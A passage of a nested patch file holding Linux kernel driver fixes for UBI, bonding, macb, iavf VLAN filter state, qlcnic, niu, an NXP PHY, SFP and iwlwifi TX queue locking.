+ 	ubi->ec_hdr_alsize = ALIGN(UBI_EC_HDR_SIZE, ubi->hdrs_min_io_size);
+ 	ubi->vid_hdr_alsize = ALIGN(UBI_VID_HDR_SIZE, ubi->hdrs_min_io_size);
+ 
+-	if (ubi->vid_hdr_offset && ((ubi->vid_hdr_offset + UBI_VID_HDR_SIZE) >
+-	    ubi->vid_hdr_alsize)) {
+-		ubi_err(ubi, "VID header offset %d too large.", ubi->vid_hdr_offset);
+-		return -EINVAL;
+-	}
+-
+ 	dbg_gen("min_io_size      %d", ubi->min_io_size);
+ 	dbg_gen("max_write_size   %d", ubi->max_write_size);
+ 	dbg_gen("hdrs_min_io_size %d", ubi->hdrs_min_io_size);
+@@ -687,6 +681,21 @@ static int io_init(struct ubi_device *ubi, int max_beb_per1024)
+ 						ubi->vid_hdr_aloffset;
+ 	}
+ 
++	/*
++	 * Memory allocation for VID header is ubi->vid_hdr_alsize
++	 * which is described in comments in io.c.
++	 * Make sure VID header shift + UBI_VID_HDR_SIZE not exceeds
++	 * ubi->vid_hdr_alsize, so that all vid header operations
++	 * won't access memory out of bounds.
++	 */
++	if ((ubi->vid_hdr_shift + UBI_VID_HDR_SIZE) > ubi->vid_hdr_alsize) {
++		ubi_err(ubi, "Invalid VID header offset %d, VID header shift(%d)"
++			" + VID header size(%zu) > VID header aligned size(%d).",
++			ubi->vid_hdr_offset, ubi->vid_hdr_shift,
++			UBI_VID_HDR_SIZE, ubi->vid_hdr_alsize);
++		return -EINVAL;
++	}
++
+ 	/* Similar for the data offset */
+ 	ubi->leb_start = ubi->vid_hdr_offset + UBI_VID_HDR_SIZE;
+ 	ubi->leb_start = ALIGN(ubi->leb_start, ubi->min_io_size);
+diff --git a/drivers/mtd/ubi/wl.c b/drivers/mtd/ubi/wl.c
+index 9e14319225c97..6049ab9e46479 100644
+--- a/drivers/mtd/ubi/wl.c
++++ b/drivers/mtd/ubi/wl.c
+@@ -575,7 +575,7 @@ static int erase_worker(struct ubi_device *ubi, struct ubi_work *wl_wrk,
+  * @vol_id: the volume ID that last used this PEB
+  * @lnum: the last used logical eraseblock number for the PEB
+  * @torture: if the physical eraseblock has to be tortured
+- * @nested: denotes whether the work_sem is already held in read mode
++ * @nested: denotes whether the work_sem is already held
+  *
+  * This function returns zero in case of success and a %-ENOMEM in case of
+  * failure.
+@@ -1131,7 +1131,7 @@ static int __erase_worker(struct ubi_device *ubi, struct ubi_work *wl_wrk)
+ 		int err1;
+ 
+ 		/* Re-schedule the LEB for erasure */
+-		err1 = schedule_erase(ubi, e, vol_id, lnum, 0, false);
++		err1 = schedule_erase(ubi, e, vol_id, lnum, 0, true);
+ 		if (err1) {
+ 			spin_lock(&ubi->wl_lock);
+ 			wl_entry_destroy(ubi, e);
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index 116d295df0b55..415cd95fb140f 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -3267,7 +3267,8 @@ static int bond_na_rcv(const struct sk_buff *skb, struct bonding *bond,
+ 
+ 	combined = skb_header_pointer(skb, 0, sizeof(_combined), &_combined);
+ 	if (!combined || combined->ip6.nexthdr != NEXTHDR_ICMP ||
+-	    combined->icmp6.icmp6_type != NDISC_NEIGHBOUR_ADVERTISEMENT)
++	    (combined->icmp6.icmp6_type != NDISC_NEIGHBOUR_SOLICITATION &&
++	     combined->icmp6.icmp6_type != NDISC_NEIGHBOUR_ADVERTISEMENT))
+ 		goto out;
+ 
+ 	saddr = &combined->ip6.saddr;
+@@ -3289,7 +3290,7 @@ static int bond_na_rcv(const struct sk_buff *skb, struct bonding *bond,
+ 	else if (curr_active_slave &&
+ 		 time_after(slave_last_rx(bond, curr_active_slave),
+ 			    curr_active_slave->last_link_up))
+-		bond_validate_na(bond, slave, saddr, daddr);
++		bond_validate_na(bond, slave, daddr, saddr);
+ 	else if (curr_arp_slave &&
+ 		 bond_time_in_interval(bond, slave_last_tx(curr_arp_slave), 1))
+ 		bond_validate_na(bond, slave, saddr, daddr);
+diff --git a/drivers/net/ethernet/cadence/macb_main.c b/drivers/net/ethernet/cadence/macb_main.c
+index 6cda31520c425..5b230831a4551 100644
+--- a/drivers/net/ethernet/cadence/macb_main.c
++++ b/drivers/net/ethernet/cadence/macb_main.c
+@@ -1009,6 +1009,10 @@ static dma_addr_t macb_get_addr(struct macb *bp, struct macb_dma_desc *desc)
+ 	}
+ #endif
+ 	addr |= MACB_BF(RX_WADDR, MACB_BFEXT(RX_WADDR, desc->addr));
++#ifdef CONFIG_MACB_USE_HWSTAMP
++	if (bp->hw_dma_cap & HW_DMA_CAP_PTP)
++		addr &= ~GEM_BIT(DMA_RXVALID);
++#endif
+ 	return addr;
+ }
+ 
+diff --git a/drivers/net/ethernet/intel/iavf/iavf.h b/drivers/net/ethernet/intel/iavf/iavf.h
+index 2a9f1eeeb7015..93a998f169de7 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf.h
++++ b/drivers/net/ethernet/intel/iavf/iavf.h
+@@ -58,8 +58,6 @@ enum iavf_vsi_state_t {
+ struct iavf_vsi {
+ 	struct iavf_adapter *back;
+ 	struct net_device *netdev;
+-	unsigned long active_cvlans[BITS_TO_LONGS(VLAN_N_VID)];
+-	unsigned long active_svlans[BITS_TO_LONGS(VLAN_N_VID)];
+ 	u16 seid;
+ 	u16 id;
+ 	DECLARE_BITMAP(state, __IAVF_VSI_STATE_SIZE__);
+@@ -157,15 +155,20 @@ struct iavf_vlan {
+ 	u16 tpid;
+ };
+ 
++enum iavf_vlan_state_t {
++	IAVF_VLAN_INVALID,
++	IAVF_VLAN_ADD,		/* filter needs to be added */
++	IAVF_VLAN_IS_NEW,	/* filter is new, wait for PF answer */
++	IAVF_VLAN_ACTIVE,	/* filter is accepted by PF */
++	IAVF_VLAN_DISABLE,	/* filter needs to be deleted by PF, then marked INACTIVE */
++	IAVF_VLAN_INACTIVE,	/* filter is inactive, we are in IFF_DOWN */
++	IAVF_VLAN_REMOVE,	/* filter needs to be removed from list */
++};
++
+ struct iavf_vlan_filter {
+ 	struct list_head list;
+ 	struct iavf_vlan vlan;
+-	struct {
+-		u8 is_new_vlan:1;	/* filter is new, wait for PF answer */
+-		u8 remove:1;		/* filter needs to be removed */
+-		u8 add:1;		/* filter needs to be added */
+-		u8 padding:5;
+-	};
++	enum iavf_vlan_state_t state;
+ };
+ 
+ #define IAVF_MAX_TRAFFIC_CLASS	4
+@@ -257,6 +260,7 @@ struct iavf_adapter {
+ 	wait_queue_head_t vc_waitqueue;
+ 	struct iavf_q_vector *q_vectors;
+ 	struct list_head vlan_filter_list;
++	int num_vlan_filters;
+ 	struct list_head mac_filter_list;
+ 	struct mutex crit_lock;
+ 	struct mutex client_lock;
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_main.c b/drivers/net/ethernet/intel/iavf/iavf_main.c
+index 8bbdf66c51f6a..05a0ea96dd11a 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_main.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_main.c
+@@ -791,7 +791,8 @@ iavf_vlan_filter *iavf_add_vlan(struct iavf_adapter *adapter,
+ 		f->vlan = vlan;
+ 
+ 		list_add_tail(&f->list, &adapter->vlan_filter_list);
+-		f->add = true;
++		f->state = IAVF_VLAN_ADD;
++		adapter->num_vlan_filters++;
+ 		adapter->aq_required |= IAVF_FLAG_AQ_ADD_VLAN_FILTER;
+ 	}
+ 
+@@ -813,7 +814,7 @@ static void iavf_del_vlan(struct iavf_adapter *adapter, struct iavf_vlan vlan)
+ 
+ 	f = iavf_find_vlan(adapter, vlan);
+ 	if (f) {
+-		f->remove = true;
++		f->state = IAVF_VLAN_REMOVE;
+ 		adapter->aq_required |= IAVF_FLAG_AQ_DEL_VLAN_FILTER;
+ 	}
+ 
+@@ -828,14 +829,18 @@ static void iavf_del_vlan(struct iavf_adapter *adapter, struct iavf_vlan vlan)
+  **/
+ static void iavf_restore_filters(struct iavf_adapter *adapter)
+ {
+-	u16 vid;
++	struct iavf_vlan_filter *f;
+ 
+ 	/* re-add all VLAN filters */
+-	for_each_set_bit(vid, adapter->vsi.active_cvlans, VLAN_N_VID)
+-		iavf_add_vlan(adapter, IAVF_VLAN(vid, ETH_P_8021Q));
++	spin_lock_bh(&adapter->mac_vlan_list_lock);
+ 
+-	for_each_set_bit(vid, adapter->vsi.active_svlans, VLAN_N_VID)
+-		iavf_add_vlan(adapter, IAVF_VLAN(vid, ETH_P_8021AD));
++	list_for_each_entry(f, &adapter->vlan_filter_list, list) {
++		if (f->state == IAVF_VLAN_INACTIVE)
++			f->state = IAVF_VLAN_ADD;
++	}
++
++	spin_unlock_bh(&adapter->mac_vlan_list_lock);
++	adapter->aq_required |= IAVF_FLAG_AQ_ADD_VLAN_FILTER;
+ }
+ 
+ /**
+@@ -844,8 +849,7 @@ static void iavf_restore_filters(struct iavf_adapter *adapter)
+  */
+ u16 iavf_get_num_vlans_added(struct iavf_adapter *adapter)
+ {
+-	return bitmap_weight(adapter->vsi.active_cvlans, VLAN_N_VID) +
+-		bitmap_weight(adapter->vsi.active_svlans, VLAN_N_VID);
++	return adapter->num_vlan_filters;
+ }
+ 
+ /**
+@@ -928,11 +932,6 @@ static int iavf_vlan_rx_kill_vid(struct net_device *netdev,
+ 		return 0;
+ 
+ 	iavf_del_vlan(adapter, IAVF_VLAN(vid, be16_to_cpu(proto)));
+-	if (proto == cpu_to_be16(ETH_P_8021Q))
+-		clear_bit(vid, adapter->vsi.active_cvlans);
+-	else
+-		clear_bit(vid, adapter->vsi.active_svlans);
+-
+ 	return 0;
+ }
+ 
+@@ -1293,16 +1292,11 @@ static void iavf_clear_mac_vlan_filters(struct iavf_adapter *adapter)
+ 		}
+ 	}
+ 
+-	/* remove all VLAN filters */
++	/* disable all VLAN filters */
+ 	list_for_each_entry_safe(vlf, vlftmp, &adapter->vlan_filter_list,
+-				 list) {
+-		if (vlf->add) {
+-			list_del(&vlf->list);
+-			kfree(vlf);
+-		} else {
+-			vlf->remove = true;
+-		}
+-	}
++				 list)
++		vlf->state = IAVF_VLAN_DISABLE;
++
+ 	spin_unlock_bh(&adapter->mac_vlan_list_lock);
+ }
+ 
+@@ -2914,6 +2908,7 @@ static void iavf_disable_vf(struct iavf_adapter *adapter)
+ 		list_del(&fv->list);
+ 		kfree(fv);
+ 	}
++	adapter->num_vlan_filters = 0;
+ 
+ 	spin_unlock_bh(&adapter->mac_vlan_list_lock);
+ 
+@@ -3131,9 +3126,6 @@ continue_reset:
+ 	adapter->aq_required |= IAVF_FLAG_AQ_ADD_CLOUD_FILTER;
+ 	iavf_misc_irq_enable(adapter);
+ 
+-	bitmap_clear(adapter->vsi.active_cvlans, 0, VLAN_N_VID);
+-	bitmap_clear(adapter->vsi.active_svlans, 0, VLAN_N_VID);
+-
+ 	mod_delayed_work(adapter->wq, &adapter->watchdog_task, 2);
+ 
+ 	/* We were running when the reset started, so we need to restore some
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+index 0fea6b9b599fb..07d37402a0df5 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+@@ -642,16 +642,10 @@ static void iavf_vlan_add_reject(struct iavf_adapter *adapter)
+ 
+ 	spin_lock_bh(&adapter->mac_vlan_list_lock);
+ 	list_for_each_entry_safe(f, ftmp, &adapter->vlan_filter_list, list) {
+-		if (f->is_new_vlan) {
+-			if (f->vlan.tpid == ETH_P_8021Q)
+-				clear_bit(f->vlan.vid,
+-					  adapter->vsi.active_cvlans);
+-			else
+-				clear_bit(f->vlan.vid,
+-					  adapter->vsi.active_svlans);
+-
++		if (f->state == IAVF_VLAN_IS_NEW) {
+ 			list_del(&f->list);
+ 			kfree(f);
++			adapter->num_vlan_filters--;
+ 		}
+ 	}
+ 	spin_unlock_bh(&adapter->mac_vlan_list_lock);
+@@ -679,7 +673,7 @@ void iavf_add_vlans(struct iavf_adapter *adapter)
+ 	spin_lock_bh(&adapter->mac_vlan_list_lock);
+ 
+ 	list_for_each_entry(f, &adapter->vlan_filter_list, list) {
+-		if (f->add)
++		if (f->state == IAVF_VLAN_ADD)
+ 			count++;
+ 	}
+ 	if (!count || !VLAN_FILTERING_ALLOWED(adapter)) {
+@@ -710,11 +704,10 @@ void iavf_add_vlans(struct iavf_adapter *adapter)
+ 		vvfl->vsi_id = adapter->vsi_res->vsi_id;
+ 		vvfl->num_elements = count;
+ 		list_for_each_entry(f, &adapter->vlan_filter_list, list) {
+-			if (f->add) {
++			if (f->state == IAVF_VLAN_ADD) {
+ 				vvfl->vlan_id[i] = f->vlan.vid;
+ 				i++;
+-				f->add = false;
+-				f->is_new_vlan = true;
++				f->state = IAVF_VLAN_IS_NEW;
+ 				if (i == count)
+ 					break;
+ 			}
+@@ -760,7 +753,7 @@ void iavf_add_vlans(struct iavf_adapter *adapter)
+ 		vvfl_v2->vport_id = adapter->vsi_res->vsi_id;
+ 		vvfl_v2->num_elements = count;
+ 		list_for_each_entry(f, &adapter->vlan_filter_list, list) {
+-			if (f->add) {
++			if (f->state == IAVF_VLAN_ADD) {
+ 				struct virtchnl_vlan_supported_caps *filtering_support =
+ 					&adapter->vlan_v2_caps.filtering.filtering_support;
+ 				struct virtchnl_vlan *vlan;
+@@ -778,8 +771,7 @@ void iavf_add_vlans(struct iavf_adapter *adapter)
+ 				vlan->tpid = f->vlan.tpid;
+ 
+ 				i++;
+-				f->add = false;
+-				f->is_new_vlan = true;
++				f->state = IAVF_VLAN_IS_NEW;
+ 			}
+ 		}
+ 
+@@ -822,10 +814,16 @@ void iavf_del_vlans(struct iavf_adapter *adapter)
+ 		 * filters marked for removal to enable bailing out before
+ 		 * sending a virtchnl message
+ 		 */
+-		if (f->remove && !VLAN_FILTERING_ALLOWED(adapter)) {
++		if (f->state == IAVF_VLAN_REMOVE &&
++		    !VLAN_FILTERING_ALLOWED(adapter)) {
+ 			list_del(&f->list);
+ 			kfree(f);
+-		} else if (f->remove) {
++			adapter->num_vlan_filters--;
++		} else if (f->state == IAVF_VLAN_DISABLE &&
++		    !VLAN_FILTERING_ALLOWED(adapter)) {
++			f->state = IAVF_VLAN_INACTIVE;
++		} else if (f->state == IAVF_VLAN_REMOVE ||
++			   f->state == IAVF_VLAN_DISABLE) {
+ 			count++;
+ 		}
+ 	}
+@@ -857,11 +855,18 @@ void iavf_del_vlans(struct iavf_adapter *adapter)
+ 		vvfl->vsi_id = adapter->vsi_res->vsi_id;
+ 		vvfl->num_elements = count;
+ 		list_for_each_entry_safe(f, ftmp, &adapter->vlan_filter_list, list) {
+-			if (f->remove) {
++			if (f->state == IAVF_VLAN_DISABLE) {
+ 				vvfl->vlan_id[i] = f->vlan.vid;
++				f->state = IAVF_VLAN_INACTIVE;
+ 				i++;
++				if (i == count)
++					break;
++			} else if (f->state == IAVF_VLAN_REMOVE) {
++				vvfl->vlan_id[i] = f->vlan.vid;
+ 				list_del(&f->list);
+ 				kfree(f);
++				adapter->num_vlan_filters--;
++				i++;
+ 				if (i == count)
+ 					break;
+ 			}
+@@ -901,7 +906,8 @@ void iavf_del_vlans(struct iavf_adapter *adapter)
+ 		vvfl_v2->vport_id = adapter->vsi_res->vsi_id;
+ 		vvfl_v2->num_elements = count;
+ 		list_for_each_entry_safe(f, ftmp, &adapter->vlan_filter_list, list) {
+-			if (f->remove) {
++			if (f->state == IAVF_VLAN_DISABLE ||
++			    f->state == IAVF_VLAN_REMOVE) {
+ 				struct virtchnl_vlan_supported_caps *filtering_support =
+ 					&adapter->vlan_v2_caps.filtering.filtering_support;
+ 				struct virtchnl_vlan *vlan;
+@@ -915,8 +921,13 @@ void iavf_del_vlans(struct iavf_adapter *adapter)
+ 				vlan->tci = f->vlan.vid;
+ 				vlan->tpid = f->vlan.tpid;
+ 
+-				list_del(&f->list);
+-				kfree(f);
++				if (f->state == IAVF_VLAN_DISABLE) {
++					f->state = IAVF_VLAN_INACTIVE;
++				} else {
++					list_del(&f->list);
++					kfree(f);
++					adapter->num_vlan_filters--;
++				}
+ 				i++;
+ 				if (i == count)
+ 					break;
+@@ -2192,7 +2203,7 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
+ 				list_for_each_entry(vlf,
+ 						    &adapter->vlan_filter_list,
+ 						    list)
+-					vlf->add = true;
++					vlf->state = IAVF_VLAN_ADD;
+ 
+ 				adapter->aq_required |=
+ 					IAVF_FLAG_AQ_ADD_VLAN_FILTER;
+@@ -2260,7 +2271,7 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
+ 				list_for_each_entry(vlf,
+ 						    &adapter->vlan_filter_list,
+ 						    list)
+-					vlf->add = true;
++					vlf->state = IAVF_VLAN_ADD;
+ 
+ 				aq_required |= IAVF_FLAG_AQ_ADD_VLAN_FILTER;
+ 			}
+@@ -2444,15 +2455,8 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
+ 
+ 		spin_lock_bh(&adapter->mac_vlan_list_lock);
+ 		list_for_each_entry(f, &adapter->vlan_filter_list, list) {
+-			if (f->is_new_vlan) {
+-				f->is_new_vlan = false;
+-				if (f->vlan.tpid == ETH_P_8021Q)
+-					set_bit(f->vlan.vid,
+-						adapter->vsi.active_cvlans);
+-				else
+-					set_bit(f->vlan.vid,
+-						adapter->vsi.active_svlans);
+-			}
++			if (f->state == IAVF_VLAN_IS_NEW)
++				f->state = IAVF_VLAN_ACTIVE;
+ 		}
+ 		spin_unlock_bh(&adapter->mac_vlan_list_lock);
+ 		}
+diff --git a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_ctx.c b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_ctx.c
+index 87f76bac2e463..eb827b86ecae8 100644
+--- a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_ctx.c
++++ b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_ctx.c
+@@ -628,7 +628,13 @@ int qlcnic_fw_create_ctx(struct qlcnic_adapter *dev)
+ 	int i, err, ring;
+ 
+ 	if (dev->flags & QLCNIC_NEED_FLR) {
+-		pci_reset_function(dev->pdev);
++		err = pci_reset_function(dev->pdev);
++		if (err) {
++			dev_err(&dev->pdev->dev,
++				"Adapter reset failed (%d). Please reboot\n",
++				err);
++			return err;
++		}
+ 		dev->flags &= ~QLCNIC_NEED_FLR;
+ 	}
+ 
+diff --git a/drivers/net/ethernet/sun/niu.c b/drivers/net/ethernet/sun/niu.c
+index e6144d963eaaa..4bbf011d53e69 100644
+--- a/drivers/net/ethernet/sun/niu.c
++++ b/drivers/net/ethernet/sun/niu.c
+@@ -4522,7 +4522,7 @@ static int niu_alloc_channels(struct niu *np)
+ 
+ 		err = niu_rbr_fill(np, rp, GFP_KERNEL);
+ 		if (err)
+-			return err;
++			goto out_err;
+ 	}
+ 
+ 	tx_rings = kcalloc(num_tx_rings, sizeof(struct tx_ring_info),
+diff --git a/drivers/net/phy/nxp-c45-tja11xx.c b/drivers/net/phy/nxp-c45-tja11xx.c
+index 5813b07242ce1..029875a59ff89 100644
+--- a/drivers/net/phy/nxp-c45-tja11xx.c
++++ b/drivers/net/phy/nxp-c45-tja11xx.c
+@@ -191,7 +191,7 @@
+ #define MAX_ID_PS			2260U
+ #define DEFAULT_ID_PS			2000U
+ 
+-#define PPM_TO_SUBNS_INC(ppb)	div_u64(GENMASK(31, 0) * (ppb) * \
++#define PPM_TO_SUBNS_INC(ppb)	div_u64(GENMASK_ULL(31, 0) * (ppb) * \
+ 					PTP_CLK_PERIOD_100BT1, NSEC_PER_SEC)
+ 
+ #define NXP_C45_SKB_CB(skb)	((struct nxp_c45_skb_cb *)(skb)->cb)
+@@ -1337,6 +1337,17 @@ no_ptp_support:
+ 	return ret;
+ }
+ 
++static void nxp_c45_remove(struct phy_device *phydev)
++{
++	struct nxp_c45_phy *priv = phydev->priv;
++
++	if (priv->ptp_clock)
++		ptp_clock_unregister(priv->ptp_clock);
++
++	skb_queue_purge(&priv->tx_queue);
++	skb_queue_purge(&priv->rx_queue);
++}
++
+ static struct phy_driver nxp_c45_driver[] = {
+ 	{
+ 		PHY_ID_MATCH_MODEL(PHY_ID_TJA_1103),
+@@ -1359,6 +1370,7 @@ static struct phy_driver nxp_c45_driver[] = {
+ 		.set_loopback		= genphy_c45_loopback,
+ 		.get_sqi		= nxp_c45_get_sqi,
+ 		.get_sqi_max		= nxp_c45_get_sqi_max,
++		.remove			= nxp_c45_remove,
+ 	},
+ };
+ 
+diff --git a/drivers/net/phy/sfp.c b/drivers/net/phy/sfp.c
+index 83b99d95b2787..b224800d7db0b 100644
+--- a/drivers/net/phy/sfp.c
++++ b/drivers/net/phy/sfp.c
+@@ -212,6 +212,12 @@ static const enum gpiod_flags gpio_flags[] = {
+ #define SFP_PHY_ADDR		22
+ #define SFP_PHY_ADDR_ROLLBALL	17
+ 
++/* SFP_EEPROM_BLOCK_SIZE is the size of data chunk to read the EEPROM
++ * at a time. Some SFP modules and also some Linux I2C drivers do not like
++ * reads longer than 16 bytes.
++ */
++#define SFP_EEPROM_BLOCK_SIZE	16
++
+ struct sff_data {
+ 	unsigned int gpios;
+ 	bool (*module_supported)(const struct sfp_eeprom_id *id);
+@@ -1927,11 +1933,7 @@ static int sfp_sm_mod_probe(struct sfp *sfp, bool report)
+ 	u8 check;
+ 	int ret;
+ 
+-	/* Some SFP modules and also some Linux I2C drivers do not like reads
+-	 * longer than 16 bytes, so read the EEPROM in chunks of 16 bytes at
+-	 * a time.
+-	 */
+-	sfp->i2c_block_size = 16;
++	sfp->i2c_block_size = SFP_EEPROM_BLOCK_SIZE;
+ 
+ 	ret = sfp_read(sfp, false, 0, &id.base, sizeof(id.base));
+ 	if (ret < 0) {
+@@ -2614,6 +2616,7 @@ static struct sfp *sfp_alloc(struct device *dev)
+ 		return ERR_PTR(-ENOMEM);
+ 
+ 	sfp->dev = dev;
++	sfp->i2c_block_size = SFP_EEPROM_BLOCK_SIZE;
+ 
+ 	mutex_init(&sfp->sm_mutex);
+ 	mutex_init(&sfp->st_mutex);
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
+index 5273ade711176..1d46a2b345eb3 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
+@@ -732,7 +732,10 @@ void iwl_mvm_mac_itxq_xmit(struct ieee80211_hw *hw, struct ieee80211_txq *txq)
+ 
+ 	rcu_read_lock();
+ 	do {
+-		while (likely(!mvmtxq->stopped &&
++		while (likely(!test_bit(IWL_MVM_TXQ_STATE_STOP_FULL,
++					&mvmtxq->state) &&
++			      !test_bit(IWL_MVM_TXQ_STATE_STOP_REDIRECT,
++					&mvmtxq->state) &&
+ 			      !test_bit(IWL_MVM_STATUS_IN_D3, &mvm->status))) {
+ 			skb = ieee80211_tx_dequeue(hw, txq);
+ 
+@@ -757,42 +760,25 @@ static void iwl_mvm_mac_wake_tx_queue(struct ieee80211_hw *hw,
+ 	struct iwl_mvm *mvm = IWL_MAC80211_GET_MVM(hw);
+ 	struct iwl_mvm_txq *mvmtxq = iwl_mvm_txq_from_mac80211(txq);
+ 
+-	/*
+-	 * Please note that racing is handled very carefully here:
+-	 * mvmtxq->txq_id is updated during allocation, and mvmtxq->list is
+-	 * deleted afterwards.
+-	 * This means that if:
+-	 * mvmtxq->txq_id != INVALID_QUEUE && list_empty(&mvmtxq->list):
+-	 *	queue is allocated and we can TX.
+-	 * mvmtxq->txq_id != INVALID_QUEUE && !list_empty(&mvmtxq->list):
+-	 *	a race, should defer the frame.
+-	 * mvmtxq->txq_id == INVALID_QUEUE && list_empty(&mvmtxq->list):
+-	 *	need to allocate the queue and defer the frame.
+-	 * mvmtxq->txq_id == INVALID_QUEUE && !list_empty(&mvmtxq->list):
+-	 *	queue is already scheduled for allocation, no need to allocate,
+-	 *	should defer the frame.
+-	 */
+-
+-	/* If the queue is allocated TX and return. */
+-	if (!txq->sta || mvmtxq->txq_id != IWL_MVM_INVALID_QUEUE) {
+-		/*
+-		 * Check that list is empty to avoid a race where txq_id is
+-		 * already updated, but the queue allocation work wasn't
+-		 * finished
+-		 */
+-		if (unlikely(txq->sta && !list_empty(&mvmtxq->list)))
+-			return;
+-
++	if (likely(test_bit(IWL_MVM_TXQ_STATE_READY, &mvmtxq->state)) ||
++	    !txq->sta) {
+ 		iwl_mvm_mac_itxq_xmit(hw, txq);
+ 		return;
+ 	}
+ 
+-	/* The list is being deleted only after the queue is fully allocated. */
+-	if (!list_empty(&mvmtxq->list))
+-		return;
++	/* iwl_mvm_mac_itxq_xmit() will later be called by the worker
++	 * to handle any packets we leave on the txq now
++	 */
+ 
+-	list_add_tail(&mvmtxq->list, &mvm->add_stream_txqs);
+-	schedule_work(&mvm->add_stream_wk);
++	spin_lock_bh(&mvm->add_stream_lock);
++	/* The list is being deleted only after the queue is fully allocated. */
++	if (list_empty(&mvmtxq->list) &&
++	    /* recheck under lock */
++	    !test_bit(IWL_MVM_TXQ_STATE_READY, &mvmtxq->state)) {
++		list_add_tail(&mvmtxq->list, &mvm->add_stream_txqs);
++		schedule_work(&mvm->add_stream_wk);
++	}
++	spin_unlock_bh(&mvm->add_stream_lock);
+ }
+ 
+ #define CHECK_BA_TRIGGER(_mvm, _trig, _tid_bm, _tid, _fmt...)		\
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/mvm.h b/drivers/net/wireless/intel/iwlwifi/mvm/mvm.h
+index ce6b701f3f4cd..157de77e129e4 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/mvm.h
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/mvm.h
+@@ -729,7 +729,10 @@ struct iwl_mvm_txq {
+ 	struct list_head list;
+ 	u16 txq_id;
+ 	atomic_t tx_request;
+-	bool stopped;
++#define IWL_MVM_TXQ_STATE_STOP_FULL	0
++#define IWL_MVM_TXQ_STATE_STOP_REDIRECT	1
++#define IWL_MVM_TXQ_STATE_READY		2
++	unsigned long state;
+ };
+ 
+ static inline struct iwl_mvm_txq *
+@@ -827,6 +830,7 @@ struct iwl_mvm {
+ 		struct iwl_mvm_tvqm_txq_info tvqm_info[IWL_MAX_TVQM_QUEUES];
+ 	};
+ 	struct work_struct add_stream_wk; /* To add streams to queues */
++	spinlock_t add_stream_lock;
+ 
+ 	const char *nvm_file_name;
+ 	struct iwl_nvm_data *nvm_data;
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/ops.c b/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
+index ebe6d9c4ccafb..c49a2a1ee4867 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
+@@ -1194,6 +1194,7 @@ iwl_op_mode_mvm_start(struct iwl_trans *trans, const struct iwl_cfg *cfg,
+ 	INIT_DELAYED_WORK(&mvm->scan_timeout_dwork, iwl_mvm_scan_timeout_wk);
+ 	INIT_WORK(&mvm->add_stream_wk, iwl_mvm_add_new_dqa_stream_wk);
+ 	INIT_LIST_HEAD(&mvm->add_stream_txqs);
++	spin_lock_init(&mvm->add_stream_lock);
+ 
+ 	init_waitqueue_head(&mvm->rx_sync_waitq);
+ 
+@@ -1690,7 +1691,10 @@ static void iwl_mvm_queue_state_change(struct iwl_op_mode *op_mode,
+ 
+ 		txq = sta->txq[tid];
+ 		mvmtxq = iwl_mvm_txq_from_mac80211(txq);
+-		mvmtxq->stopped = !start;
++		if (start)
++			clear_bit(IWL_MVM_TXQ_STATE_STOP_FULL, &mvmtxq->state);
++		else
++			set_bit(IWL_MVM_TXQ_STATE_STOP_FULL, &mvmtxq->state);
+ 
+ 		if (start && mvmsta->sta_state != IEEE80211_STA_NOTEXIST)
+ 			iwl_mvm_mac_itxq_xmit(mvm->hw, txq);
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/sta.c b/drivers/net/wireless/intel/iwlwifi/mvm/sta.c
+index 69634fb82a9bf..9caae77995ca9 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/sta.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/sta.c
+@@ -384,8 +384,11 @@ static int iwl_mvm_disable_txq(struct iwl_mvm *mvm, struct ieee80211_sta *sta,
+ 		struct iwl_mvm_txq *mvmtxq =
+ 			iwl_mvm_txq_from_tid(sta, tid);
+ 
+-		mvmtxq->txq_id = IWL_MVM_INVALID_QUEUE;
++		spin_lock_bh(&mvm->add_stream_lock);
+ 		list_del_init(&mvmtxq->list);
++		clear_bit(IWL_MVM_TXQ_STATE_READY, &mvmtxq->state);
++		mvmtxq->txq_id = IWL_MVM_INVALID_QUEUE;
++		spin_unlock_bh(&mvm->add_stream_lock);
+ 	}
+ 
+ 	/* Regardless if this is a reserved TXQ for a STA - mark it as false */
+@@ -479,8 +482,11 @@ static int iwl_mvm_remove_sta_queue_marking(struct iwl_mvm *mvm, int queue)
+ 			disable_agg_tids |= BIT(tid);
+ 		mvmsta->tid_data[tid].txq_id = IWL_MVM_INVALID_QUEUE;
+ 
+-		mvmtxq->txq_id = IWL_MVM_INVALID_QUEUE;
++		spin_lock_bh(&mvm->add_stream_lock);
+ 		list_del_init(&mvmtxq->list);
++		clear_bit(IWL_MVM_TXQ_STATE_READY, &mvmtxq->state);
++		mvmtxq->txq_id = IWL_MVM_INVALID_QUEUE;
++		spin_unlock_bh(&mvm->add_stream_lock);
+ 	}
+ 
